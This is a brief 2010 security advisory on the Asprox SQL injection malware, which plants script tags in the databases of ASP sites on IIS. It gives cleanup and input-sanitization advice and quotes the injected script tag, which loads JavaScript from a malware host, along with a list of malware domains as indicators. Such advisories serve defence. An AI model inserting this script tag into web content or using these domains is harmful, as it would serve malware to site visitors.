Asprox SQL Injection Malware
Updated: September 28, 2010
The Asprox SQL injection malware injects malware scripts into a website's SQL database through vulnerable ASP web pages in websites hosted on an IIS Server. To get rid of the malware scripts, the malware scripts need to be removed from the database. If the security vulnerability is not fixed the website will get reinfected the next time malware attempts to infect the website. To fix the security vulnerability all user input data needs to be sanitized. This can be done by modifying the web page's code, Microsoft has guide for doing this in ASP and ASP.net based pages. It can also be done with software that filters harmful HTTP request, such as Microsoft's URLScan.
Current Script Format: <script type="text/javascript" src="http://pic.webservicesmulti.ru/js.js"></script>
Recent Domains Used by the Malware: adtcp.ru, ads-t.ru, clickmeter.ru, bannerdriven.ru, scriptjs.ru, htmlads.ru, jsportal.ru, yahoosite.ru, z360.net, 318x.com, 18xn.com, dnf666.net, robint.us, 2677.in, postfolkovs.ru, webservicesmulti.ru, webserviceskot.ru, webservicesrob.ru, google-stats50.info, google-stats47.info